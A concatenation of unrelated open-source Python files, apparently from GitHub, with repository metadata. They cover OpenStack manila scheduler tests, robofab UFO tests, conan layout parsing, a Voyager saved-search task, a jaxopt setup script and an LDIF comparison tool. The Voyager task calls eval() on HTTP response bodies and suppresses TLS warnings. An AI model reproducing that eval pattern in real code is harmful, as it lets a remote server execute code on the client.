def _get_version(version_id: VersionID) -> Version:
version = page_service.find_version(version_id)
if version is None:
abort(404)
return version
| {
"content_hash": "75e246dda7369ea95bbd10bbd2f4726d",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 79,
"avg_line_length": 27.46397694524496,
"alnum_prop": 0.6508919202518363,
"repo_name": "homeworkprod/byceps",
"id": "ac56e6e472f866e22d452b68c5f50004257fbc9f",
"size": "9530",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "byceps/blueprints/admin/page/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38198"
},
{
"name": "HTML",
"bytes": "318830"
},
{
"name": "JavaScript",
"bytes": "8541"
},
{
"name": "Python",
"bytes": "935249"
}
],
"symlink_target": ""
} |
"""
Tests for Host Affinity Weigher.
"""
from unittest import mock
from manila.common import constants
from manila.db import api as db_api
from manila.scheduler.weighers import host_affinity
from manila import test
from manila.tests import db_utils
from manila.tests.scheduler import fakes
class HostAffinityWeigherTestCase(test.TestCase):
def setUp(self):
super(HostAffinityWeigherTestCase, self).setUp()
self.weigher = host_affinity.HostAffinityWeigher()
@staticmethod
def _create_weight_properties(snapshot_id=None,
snapshot_host=None,
availability_zone_id=None):
return {
'request_spec': {
'snapshot_id': snapshot_id,
'snapshot_host': snapshot_host,
},
'availability_zone_id': availability_zone_id,
}
def test_without_snapshot_id(self):
host_state = fakes.FakeHostState('host1', {
'host': 'host1@AAA#pool2',
})
weight_properties = self._create_weight_properties(
snapshot_host='fake_snapshot_host')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(0, weight)
def test_without_snapshot_host(self):
host_state = fakes.FakeHostState('host1', {
'host': 'host1@AAA#pool2',
})
weight_properties = self._create_weight_properties(
snapshot_id='fake_snapshot_id')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(0, weight)
def test_same_backend_and_pool(self):
share = db_utils.create_share(host="host1@AAA#pool1",
status=constants.STATUS_AVAILABLE)
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
host_state = fakes.FakeHostState('host1@AAA#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'])
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(100, weight)
def test_same_backend_different_pool(self):
share = db_utils.create_share(host="host1@AAA#pool1",
status=constants.STATUS_AVAILABLE)
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
host_state = fakes.FakeHostState('host1@AAA#pool2', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'])
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(75, weight)
def test_different_backend_same_availability_zone(self):
share = db_utils.create_share(
host="host1@AAA#pool1", status=constants.STATUS_AVAILABLE,
availability_zone=fakes.FAKE_AZ_1['name'])
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
self.mock_object(db_api, 'availability_zone_get',
mock.Mock(return_value=type(
'FakeAZ', (object, ), {
'id': fakes.FAKE_AZ_1['id'],
'name': fakes.FAKE_AZ_1['name'],
})))
host_state = fakes.FakeHostState('host2@BBB#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'],
availability_zone_id='zone1')
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(50, weight)
def test_different_backend_and_availability_zone(self):
share = db_utils.create_share(
host="host1@AAA#pool1", status=constants.STATUS_AVAILABLE,
availability_zone=fakes.FAKE_AZ_1['name'])
snapshot = db_utils.create_snapshot(share_id=share['id'])
self.mock_object(db_api, 'share_snapshot_get',
mock.Mock(return_value=snapshot))
self.mock_object(db_api, 'availability_zone_get',
mock.Mock(return_value=type(
'FakeAZ', (object,), {
'id': fakes.FAKE_AZ_2['id'],
'name': fakes.FAKE_AZ_2['name'],
})))
host_state = fakes.FakeHostState('host2@BBB#pool1', {})
weight_properties = self._create_weight_properties(
snapshot_id=snapshot['id'], snapshot_host=share['host'],
availability_zone_id='zone1'
)
weight = self.weigher._weigh_object(host_state, weight_properties)
self.assertEqual(25, weight)
| {
"content_hash": "2b9b8d84b96b1f3fec103fb38099e9e2",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 74,
"avg_line_length": 41.65853658536585,
"alnum_prop": 0.582552693208431,
"repo_name": "openstack/manila",
"id": "6b5d809bf2562d4fe2fec89907a8a6d05f1c9ffa",
"size": "5752",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/scheduler/weighers/test_host_affinity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "12728998"
},
{
"name": "Shell",
"bytes": "107601"
}
],
"symlink_target": ""
} |
import os
import shutil
import unittest
import tempfile
from robofab.plistlib import readPlist
import robofab
from robofab.test.testSupport import fontInfoVersion2, expectedFontInfo1To2Conversion, expectedFontInfo2To1Conversion
from robofab.objects.objectsRF import NewFont, OpenFont
from robofab.ufoLib import UFOReader
ufoPath1 = os.path.dirname(robofab.__file__)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.join(ufoPath1, "TestData", "TestFont1 (UFO1).ufo")
ufoPath2 = ufoPath1.replace("TestFont1 (UFO1).ufo", "TestFont1 (UFO2).ufo")
# robofab should remove these from the lib after a load.
removeFromFormatVersion1Lib = [
"org.robofab.opentype.classes",
"org.robofab.opentype.features",
"org.robofab.opentype.featureorder",
"org.robofab.postScriptHintData"
]
class ReadUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self):
self.font = OpenFont(ufoPath1)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True):
reader = UFOReader(ufoPath1)
results = {}
# info
infoMatches = True
info = self.font.info
for attr, expectedValue in list(expectedFontInfo1To2Conversion.items()):
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
# kerning
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
# groups
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
# features
features = self.font.features.text
f = open(os.path.join(ufoPath2, "features.fea"), "r")
expectedFeatures = f.read()
f.close()
match = True
features = [line for line in features.splitlines() if line]
expectedFeatures = [line for line in expectedFeatures.splitlines() if line]
if expectedFeatures != features or reader.readFeatures() != "":
match = False
results["features"] = match
# lib
lib = dict(self.font.lib)
expectedLib = reader.readLib()
for key in removeFromFormatVersion1Lib:
if key in expectedLib:
del expectedLib[key]
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont()
info = self.font.info
for attr, expectedValue in list(expectedFontInfo1To2Conversion.items()):
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
class ReadUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self):
self.font = OpenFont(ufoPath2)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True):
reader = UFOReader(ufoPath2)
results = {}
# info
infoMatches = True
info = self.font.info
for attr, expectedValue in list(fontInfoVersion2.items()):
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
# kerning
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
# groups
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
# features
features = self.font.features.text
expectedFeatures = reader.readFeatures()
results["features"] = expectedFeatures == features
# lib
lib = dict(self.font.lib)
expectedLib = reader.readLib()
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont()
info = self.font.info
for attr, expectedValue in list(fontInfoVersion2.items()):
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
class WriteUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(ufoPath2)
self.font.save(self.dstDir, formatVersion=1)
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self):
readerExpected = UFOReader(ufoPath1)
readerWritten = UFOReader(self.dstDir)
results = {}
# info
matches = True
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in list(expected.items()):
if expectedValue != written.get(attr):
matches = False
break
results["info"] = matches
# kerning
matches = True
expectedPath = os.path.join(ufoPath1, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
# groups
matches = True
expectedPath = os.path.join(ufoPath1, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
# features
matches = True
expectedPath = os.path.join(ufoPath1, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if os.path.exists(writtenPath):
matches = False
results["features"] = matches
# lib
matches = True
expectedPath = os.path.join(ufoPath1, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
writtenLib = readPlist(writtenPath)
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(ufoPath2)
self.font.save(self.dstDir)
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self):
readerExpected = UFOReader(ufoPath2)
readerWritten = UFOReader(self.dstDir)
results = {}
# info
matches = True
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in list(expected.items()):
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
# kerning
matches = True
expectedPath = os.path.join(ufoPath2, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
# groups
matches = True
expectedPath = os.path.join(ufoPath2, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
# features
matches = True
expectedPath = os.path.join(ufoPath2, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if not os.path.exists(writtenPath):
matches = False
else:
f = open(expectedPath, "r")
expectedText = f.read()
f.close()
f = open(writtenPath, "r")
writtenText = f.read()
f.close()
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedText.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
# lib
matches = True
expectedPath = os.path.join(ufoPath2, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
writtenLib = readPlist(writtenPath)
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
if __name__ == "__main__":
from robofab.test.testSupport import runTests
runTests()
| {
"content_hash": "368f3408eb8704af7c0b9191fd0ba0d9",
"timestamp": "",
"source": "github",
"line_count": 321,
"max_line_length": 117,
"avg_line_length": 30.35202492211838,
"alnum_prop": 0.722467412501283,
"repo_name": "adrientetar/robofab",
"id": "b948bd7fa03885d646d6364d36ae5c9cbdb9278c",
"size": "9743",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3-ufo3",
"path": "Lib/robofab/test/test_noneLabUFOReadWrite.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1226417"
}
],
"symlink_target": ""
} |
import os
from collections import OrderedDict
import six
from six.moves import configparser
from conans.errors import ConanException
from conans.model.ref import ConanFileReference, check_valid_ref
from conans.util.files import load
from conans.util.templates import render_layout_file
DEFAULT_LAYOUT_FILE = "default"
LAYOUTS_FOLDER = 'layouts'
def get_editable_abs_path(path, cwd, cache_folder):
# Check the layout file exists, is correct, and get its abs-path
if path:
layout_abs_path = os.path.normpath(os.path.join(cwd, path))
if not os.path.isfile(layout_abs_path):
layout_abs_path = os.path.join(cache_folder, LAYOUTS_FOLDER, path)
if not os.path.isfile(layout_abs_path):
raise ConanException("Couldn't find layout file: %s" % path)
return layout_abs_path
# Default only in cache
layout_default_path = os.path.join(cache_folder, LAYOUTS_FOLDER, DEFAULT_LAYOUT_FILE)
if os.path.isfile(layout_default_path):
return layout_default_path
class EditableLayout(object):
BUILD_FOLDER = "build_folder"
SOURCE_FOLDER = "source_folder"
cpp_info_dirs = ['includedirs', 'libdirs', 'resdirs', 'bindirs', 'builddirs', 'srcdirs', 'frameworkdirs']
folders = [BUILD_FOLDER, SOURCE_FOLDER]
def __init__(self, filepath):
self._filepath = filepath
def folder(self, ref, name, settings, options):
_, folders = self._load_data(ref, settings=settings, options=options)
try:
path = folders.get(str(ref)) or folders.get(None) or {}
return path[name]
except KeyError:
return None
@staticmethod
def _work_on_item(value):
value = value.replace('\\', '/')
return value
def _parse_layout_file(self, ref, settings, options):
content = load(self._filepath)
try:
content = render_layout_file(content, ref=ref, settings=settings, options=options)
parser = configparser.ConfigParser(allow_no_value=True)
parser.optionxform = str
if six.PY3:
parser.read_string(content)
else:
parser.readfp(six.StringIO(content))
except (configparser.Error, ConanException) as e:
raise ConanException("Error parsing layout file '%s' (for reference '%s')\n%s" %
(self._filepath, str(ref), str(e)))
return parser
def _load_data(self, ref, settings, options):
parser = self._parse_layout_file(ref, settings, options)
# Build a convenient data structure
data = OrderedDict()
folders = {}
for section in parser.sections():
reference, section_name = section.rsplit(":", 1) if ':' in section else (None, section)
if section_name in EditableLayout.folders:
items = [k for k, _ in parser.items(section)] or [""]
if len(items) > 1:
raise ConanException("'%s' with more than one value in layout file: %s"
% (section_name, self._filepath))
folders.setdefault(reference, {})[section_name] = self._work_on_item(items[0])
continue
if section_name not in EditableLayout.cpp_info_dirs:
raise ConanException("Wrong cpp_info field '%s' in layout file: %s"
% (section_name, self._filepath))
if reference:
if not check_valid_ref(reference):
raise ConanException("Wrong package reference '%s' in layout file: %s"
% (reference, self._filepath))
else:
r = ConanFileReference.loads(reference, validate=True)
if r.revision:
raise ConanException("Don't provide revision in Editable layouts")
data.setdefault(reference, {})[section_name] =\
[self._work_on_item(k) for k, _ in parser.items(section)]
return data, folders
def apply_to(self, ref, cpp_info, settings=None, options=None):
data, _ = self._load_data(ref, settings=settings, options=options)
# Apply the data to the cpp_info
data = data.get(str(ref)) or data.get(None) or {}
try:
for key, items in data.items():
setattr(cpp_info, key, items)
except Exception as e:
raise ConanException("Error applying layout in '%s': %s" % (str(ref), str(e)))
| {
"content_hash": "53c60d8cff3383d7c12648850fc792d7",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 109,
"avg_line_length": 40.078947368421055,
"alnum_prop": 0.5924710002188662,
"repo_name": "conan-io/conan",
"id": "8a251bd22c8f661b413953b2a4e9aca40f7d5de4",
"size": "4584",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "conans/model/editable_layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "264"
},
{
"name": "C++",
"bytes": "425"
},
{
"name": "CMake",
"bytes": "447"
},
{
"name": "Python",
"bytes": "8209945"
}
],
"symlink_target": ""
} |
import os
import sys
import json
import requests
import urllib
from utils import status
from utils import task_utils
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', InsecureRequestWarning)
# Get SSL trust setting.
verify_ssl = task_utils.get_ssl_mode()
status_writer = status.Writer()
errors_reasons = {}
def find_between( s, first, last ):
"""Find a string between two characters."""
try:
start = s.index(first) + len(first)
end = s.index(last, start)
return s[start:end]
except ValueError:
return ""
def get_display_tempate_id(owner):
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/config/default".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json',
'x-access-token': task_utils.get_security_token(owner)})
if get_response.status_code == 200:
return get_response.json()['id']
else:
return ''
except requests.HTTPError:
return ''
except requests.exceptions.InvalidURL:
return ''
except requests.RequestException:
return ''
def get_existing_saved_search_query(search_name, owner):
"""Retrieves the query from an existing saved search."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/ssearch/export".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json',
'x-access-token': task_utils.get_security_token(owner)})
search_query = ''
if get_response.status_code == 200:
saved_searches = get_response.json()['searches']
for ss in saved_searches:
if ss['title'] == search_name:
search_query = ss['path']
return True, search_query
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
def delete_saved_search(search_name, owner):
"""Deletes an existing saved search. This is used when overwriting a saved search."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/ssearch/export".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if get_response.status_code == 200:
delete_url = ''
saved_searches = get_response.json()['searches']
for ss in saved_searches:
if ss['title'] == search_name:
search_id = ss['id']
delete_url = "{0}/api/rest/display/ssearch/{1}".format(voyager_server, search_id)
break
if delete_url:
res = requests.delete(delete_url, verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if not res.status_code == 200:
if hasattr(res, 'content'):
return False, eval(res.content)['error']
else:
return False, 'Error creating saved search: {0}: {1}'.format(search_name, res.reason)
else:
return True, ''
else:
return True, ''
else:
return False, eval(get_response.content)['message']
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
def create_saved_search(search_name, groups, owner, query, has_q):
"""Create the saved search using Voyager API."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
url = "{0}/api/rest/display/ssearch".format(voyager_server)
if query:
template_id = get_display_tempate_id(owner)
if has_q:
if query.endswith('/'):
path = "/q=" + query + 'disp={0}'.format(template_id)
else:
path = "/q=" + query + '/disp={0}'.format(template_id)
else:
if query.endswith('/'):
path ="/" + query + 'disp={0}'.format(template_id)
else:
path = "/" + query + '/disp={0}'.format(template_id)
query = {
"title": str(search_name),
"owner": str(owner['name']),
"path": str(path),
"share": groups,
"overwrite": True
}
else:
query = {
"title": search_name,
"owner": owner['name'],
"path": "",
"share": groups
}
response = requests.post(url, json.dumps(query), verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if response.status_code == 200:
return True, 'Created save search: {0}'.format(response.json()['title'])
else:
if hasattr(response, 'content'):
return False, eval(response.content)['error']
else:
return False, 'Error creating saved search: {0}: {1}'.format(search_name, response.reason)
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
def execute(request):
"""Remove tags.
:param request: json as a dict.
"""
query = ''
errors = 0
parameters = request['params']
archive_location = request['folder']
if not os.path.exists(archive_location):
os.makedirs(archive_location)
# Parameter values
search_action = task_utils.get_parameter_value(parameters, 'search_action', 'value')
search_name = task_utils.get_parameter_value(parameters, 'saved_searches', 'value')
search_name = eval(search_name[0])['text']
groups = task_utils.get_parameter_value(parameters, 'groups', 'value')
request_owner = request['owner']
result_count, response_index = task_utils.get_result_count(parameters)
fq = '/'
if 'fq' in parameters[response_index]['query']:
if isinstance(parameters[response_index]['query']['fq'], list):
for q in parameters[response_index]['query']['fq']:
if '{!tag=' in q:
q = q.split('}')[1]
if ':' in q:
facet = q.split(':')[0]
value = q.split(':')[1]
if '(' in value:
value = value.replace('(', '').replace(')', '')
value = urllib.urlencode({'val': value.replace('"', '')})
value = value.split('val=')[1]
facet2 = 'f.{0}='.format(facet)
q = '{0}{1}'.format(facet2, value) #q.replace(facet + ':', facet2)
fq += '{0}/'.format(q).replace('"', '')
else:
# Replace spaces with %20 & remove \\ to avoid HTTP Error 400.
fq += '&fq={0}'.format(parameters[response_index]['query']['fq'].replace("\\", ""))
if '{!tag=' in fq:
fq = fq.split('}')[1]
if ':' in fq:
if fq.startswith('/&fq='):
fq = fq.replace('/&fq=', '')
facet = fq.split(':')[0]
value = fq.split(':')[1].replace('(', '').replace(')', '').replace('"', '')
if 'place' not in facet:
value = urllib.urlencode({'val': value}).split('val=')[1]
facet2 = 'f.{0}='.format(facet)
if '(' in value:
fq = ''
if value.split(' '):
for v in value.split(' '):
fq += (facet2 + v.replace('(', '').replace(')', '') + '/').replace(':', '')
else:
value = urllib.urlencode({'val': value}).split('val=')[1]
fq = '{0}{1}'.format(facet2, value)
if '{! place.op=' in fq:
relop = find_between(fq, 'place.op=', '}')
fq = fq.replace('}', '').replace('{', '')
fq = fq.replace('! place.op={0}'.format(relop), '/place.op={0}/'.format(relop))
fq = fq.replace('place:', 'place=')
fq = fq.replace('&fq=', '')
hasQ = False
if 'q' in parameters[response_index]['query']:
query = parameters[response_index]['query']['q']
hasQ = True
if fq:
query += '/'
if fq:
if fq.startswith('/place'):
query += fq.replace('"', '')
elif '!tag' in query and 'OR' in query:
# e.g. "path": "/q=id:(92cdd06e01761c4c d9841b2f59b8a326) OR format:(application%2Fvnd.esri.shapefile)"
q = query.split('}')[1].replace('))/', '').replace('(', '').replace('(', '')
q = urllib.urlencode({'val': q.split(':')[1]}).split('val=')[1]
query = query.split(' OR ')[0] + ' OR ' + q
else:
if fq.startswith('f.//'):
fq = fq.replace('f.//', '/').replace('"', '')
if ' place.id' in fq:
fq = fq.replace(' place.id', '/place.id').replace('"', '')
if '{! place.op=' in fq:
relop = find_between(fq, 'place.op=', '}')
fq = fq.replace('}', '').replace('{', '')
fq = fq.replace('! place.op={0}'.format(relop), '/place.op={0}/'.format(relop)).replace('"', '')
query += fq.rstrip('/')
query = query.replace('f./', '')
query = query.replace('&fq=', '')
if search_action == 'Overwrite an existing saved search':
delete_result = delete_saved_search(search_name, request_owner)
if not delete_result[0]:
status_writer.send_state(status.STAT_FAILED, delete_result[1])
return
if query:
result = create_saved_search(search_name, groups, request_owner, query, hasQ)
else:
result = create_saved_search(search_name, groups, request_owner, "", hasQ)
if not result[0]:
errors += 1
errors_reasons[search_name] = result[1]
# Update state if necessary.
if errors > 0:
status_writer.send_state(status.STAT_FAILED, result[1])
else:
status_writer.send_status(result[1])
task_utils.report(os.path.join(request['folder'], '__report.json'), 1, 0, errors, errors_details=errors_reasons)
| {
"content_hash": "d45d7592e2c5f927f4d00940445f36dd",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 177,
"avg_line_length": 42.79770992366412,
"alnum_prop": 0.5270667974672255,
"repo_name": "voyagersearch/voyager-py",
"id": "c4670791a9ee13c134bea5d448f183c09a28555d",
"size": "11816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/tasks/create_saved_search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "Python",
"bytes": "1008753"
},
{
"name": "Shell",
"bytes": "14"
}
],
"symlink_target": ""
} |
"""Setup script for JAXopt."""
import os
from setuptools import find_packages
from setuptools import setup
folder = os.path.dirname(__file__)
version_path = os.path.join(folder, "jaxopt", "version.py")
__version__ = None
with open(version_path) as f:
exec(f.read(), globals())
req_path = os.path.join(folder, "requirements.txt")
install_requires = []
if os.path.exists(req_path):
with open(req_path) as fp:
install_requires = [line.strip() for line in fp]
readme_path = os.path.join(folder, "README.md")
readme_contents = ""
if os.path.exists(readme_path):
with open(readme_path) as fp:
readme_contents = fp.read().strip()
setup(
name="jaxopt",
version=__version__,
description="Hardware accelerated, batchable and differentiable optimizers in JAX.",
author="Google LLC",
author_email="[email protected]",
url="https://github.com/google/jaxopt",
long_description=readme_contents,
long_description_content_type="text/markdown",
license="Apache 2.0",
packages=find_packages(),
package_data={},
install_requires=install_requires,
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
keywords="optimization, root finding, implicit differentiation, jax",
requires_python=">=3.7",
)
| {
"content_hash": "91d04f98c9c0b1ddd842d6caa8cb1eb1",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 88,
"avg_line_length": 31.78846153846154,
"alnum_prop": 0.6636418632788869,
"repo_name": "google/jaxopt",
"id": "b9f7934a9a7011632971e548ca5a2a3d04d58e09",
"size": "2229",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "670734"
}
],
"symlink_target": ""
} |
def inject_app_defaults(application):
"""Inject an application's default settings"""
try:
__import__('%s.settings' % application)
import sys
# Import our defaults, project defaults, and project settings
_app_settings = sys.modules['%s.settings' % application]
_def_settings = sys.modules['django.conf.global_settings']
_settings = sys.modules['django.conf'].settings
# Add the values from the application.settings module
for _k in dir(_app_settings):
if _k.isupper():
# Add the value to the default settings module
setattr(_def_settings, _k, getattr(_app_settings, _k))
# Add the value to the settings, if not already present
if not hasattr(_settings, _k):
setattr(_settings, _k, getattr(_app_settings, _k))
except ImportError:
# Silently skip failing settings modules
pass
inject_app_defaults(__name__) | {
"content_hash": "672f5837d965ccde5969588b6c04434f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 63,
"avg_line_length": 33.11538461538461,
"alnum_prop": 0.6968641114982579,
"repo_name": "thsutton/django-application-settings",
"id": "b10e2fd5d64728ae7ec729e9e5591adf31e7e93c",
"size": "861",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "foo/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1926"
}
],
"symlink_target": ""
} |
import sys
from ldif import LDIFParser, LDIFWriter, LDIFRecordList
class LDIFVerifier():
"""
Check that two LDIF files contain equivalent LDAP information. If they
don't, emit a summary of the differences
"""
def __init__( self, file1, file2):
"""
Parameters:
file1
filename of first file to read
file2
filename of second file to read
"""
self.src1 = LDIFRecordList(open(file1))
self.src2 = LDIFRecordList(open(file2))
def emitDifferingValues( self, attributes1, attributes2):
"""
Emit a description of the differences between two dictionaries of attribute values
"""
for attributeName, attributeValues1 in attributes1.iteritems():
if attributeName in attributes2:
attributeValues2 = attributes2[attributeName]
if attributeValues1 != attributeValues2:
print " " + attributeName + ": " + str(attributeValues1) + " != " + str(attributeValues2)
else:
print " " + attributeName + ": missing in second file"
def emitDifferences( self, summary1, summary2):
"""
Emit all differences between the two LDAP objects. The
supplied parameters are dictionaries between the object DN and
a list of attributes
"""
count = 0
for dnLower,wrappedObject1 in summary1.iteritems():
(dn,attributes1) = wrappedObject1
if dnLower in summary2:
wrappedObject2 = summary2 [dnLower]
(dn2,attributes2) = wrappedObject2
if( attributes1 != attributes2):
count += 1
print "\n dn: " + dn
print " [difference in attribute values]\n"
self.emitDifferingValues( attributes1, attributes2)
else:
count += 1
print "\n dn: " + dn
print " [object missing in second file]\n"
self.printSummary( dn, attributes1)
for dnLower,wrappedObject2 in summary2.iteritems():
(dn,attributes2) = wrappedObject2
if not dnLower in summary1:
count += 1
print "\n dn: " + dn
print " [object missing in first file]\n"
self.printSummary( dn, attributes2)
return count
def printSummary( self, dn, attributes):
"""
Print a complete LDAP object
